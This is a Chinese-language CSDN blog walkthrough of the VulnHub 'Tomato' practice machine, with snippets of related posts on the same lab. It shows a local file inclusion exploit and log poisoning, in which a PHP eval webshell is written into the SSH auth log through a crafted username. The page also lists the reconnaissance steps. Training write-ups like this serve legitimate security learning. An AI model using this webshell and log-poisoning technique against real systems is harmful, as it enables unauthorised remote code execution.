tomato靶场攻略

已于 2024-09-05 10:03:12 修改
阅读量429 收藏 3
点赞数 10
文章标签: 安全 web安全
于 2024-09-04 18:54:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kknifek/article/details/141892561
版权

1.使用nmap扫描同网段的端口,发现靶机地址

2.访问到主页面,只能看到一个大西红柿

3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image

4.访问我们扫到的地址 ,点金目录里看看有些什么文件

5.看到info.php很熟悉,点进去看看

 

6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞

7. 利用文件包含漏洞,我们尝试查看一下passwd文件内容,可以成功

 

 8.再来看看日志文件发现记录了ssh登录的登录日志,利用这个机制写入一句话木马

"<?php @eval($_POST[cmd]);?>"@172.16.1.200 -p 2211 

 

9.写入之后使用蚁剑连接

桶将军T
关注
tomato靶场复现
m0_68471358的博客
08-03 457
在多次尝试后,发现/var/log/auth.log中记录了FTP和SSH的登录服务,我们使用root和root123123123123123账户尝试ssh登录,可以看到被写入到了auth.log日志文件中,如果我们换成一句话木马内容,并且写入到此日志文件中,就可以使用系统目前的文件包含漏洞加载此日志文件,加载一句话木马。include语句会获取指定文件中存在的所有文本/代码/标记,文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。
vulnhub靶场-tomato
qq_42947816的博客
03-07 7614
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
Tomato靶场通关攻略
2301_81525518的博客
09-04 804
利用ssh连接写入木马 ssh '
tomato靶场通关攻略
2301_78031880的博客
09-04 365
将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。进入antibots中。
tomato靶场打靶过程
qq_64703089的博客
08-02 591
本次打靶利用的是文件包含漏洞包含日志GetShell,通过写入错误登录信息连接shell。
tomato靶场获得shell
m0_74214882的博客
08-02 468
2211端口后面有用。
tomato靶场
weixin_69065643的博客
07-29 420
访问/etc/passwd/发现确实有文件包含漏洞。产看iofo.php源码,发现里面有文件包含漏洞。我们用kali扫描一下目录。
tomato 靶场
starhei.zxy的博客
07-29 590
p-: 这个选项告诉 nmap 扫描目标系统上的所有可能的端口。扫描所有端口可能会耗费一定的时间,但可以全面了解目标系统上开放的哪些端口,以及哪些端口可能存在漏洞。/var/log/auth.log 记录了所有和用户认证相关的日志。侵略性扫描通常会提供更多的信息,但也可能引起目标系统的注意。5.访问antibot_image目录 http://192.168.233.131/antibot_image/看这个发现端口没全部扫出来 再用这个扫一下nmap -A 192.168.233.131 -p-
tomato靶场通关
m0_73771249的博客
09-04 179
6、查看etc/passwd ,查看日志。8、使用蚁剑进行连接查看,可以使用终端。4、发现一个info.php文件查看。1、使用nmap扫描C段查找网址。5、查看源代码,发现文件包含漏洞。2、使用dirb扫描目录。3、打开网站查看目录。
Vulnhub篇Tomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
tomato打印服务共享教程
06-01
tomato打印服务共享教程 本教程旨在指导用户如何配置tomato打印服务共享,实现打印机的网络共享。整个过程可以分为五个步骤:配置服务器、启动打印服务功能;有线接入主路由配置;无线连接主路由配置;电脑添加网络...
tomato固件修改工具
06-01
"Tomato固件修改工具"是一款专为网络路由器固件定制和优化的工具,尤其适用于那些使用Tomato固件的设备。Tomato是一款轻量级的开源固件,基于Linux,提供了一系列高级功能,如DDNS(动态域名解析服务)、QoS(服务...
vulnhub靶场-tomato渗透测试
m0_62750315的博客
09-08 1571
小白学渗透
VulnHub渗透测试实战靶场 - Tomato
m0_74215510的博客
04-27 1356
靶机名称:tomato 靶机难度:中等到困难 虚拟机环境:VMware Workstation 15.x Pro(此靶机推荐使用VMware搭建) 目标:获取root shell,即(root@localhost:~#),然后获取/root下的flag 靶机地址:https://download.vulnhub.com/tomato/Tomato.ova
网络安全 网络安全的主要领域 安全威胁 防护技术 安全策略 未来趋势
weixin_42462436的博客
10-03 1529
随着智能手机和平板电脑的广泛使用,移动设备的安全(如数据加密、设备丢失保护等)也成为重点。由国家级或高级黑客组织发起的持续性、高度隐蔽的网络攻击,通常以窃取敏感信息为目的。使用加密、访问控制、数据备份等手段来保护信息免受未经授权的访问、修改或删除。包括防火墙、入侵检测系统(IDS)、入侵防御系统(IPS)等技术的使用。保证操作系统和相关服务的安全,包括权限控制、补丁管理、系统日志监控等。利用全球收集的安全信息和分析工具,提前识别并防御潜在的威胁。关注对虚拟化平台、API安全、数据隔离和访问管理的控制。
信息安全工程师(28)机房安全分析与防护
m0_73399576的博客
10-02 1030
信息安全工程师——机房安全分析与防护篇
网 络 安 全
最新发布
数字人生
10-06 1662
定义:网络安全是指网络系统的硬件、软件及其系统中的数据受到保护的状态。范畴硬件安全:包括网络设备、服务器、终端等物理设备的安全。软件安全:包括操作系统、应用软件、数据库等的安全。数据安全:包括数据的保密性、完整性、可用性等。
2024年三个月网络安全(黑客技术)入门教程
2401_85027336的博客
09-25 2074
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
双WAN Tomato路由器配置指南
"本文主要介绍了如何使用Tomato固件实现双WAN上网的配置方法,适合于想要提高网络连接稳定性和速度的用户。" 在家庭或小型办公室网络环境中,使用双WAN(Wide Area Network,广域网)可以提供更高的网络冗余和带宽...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值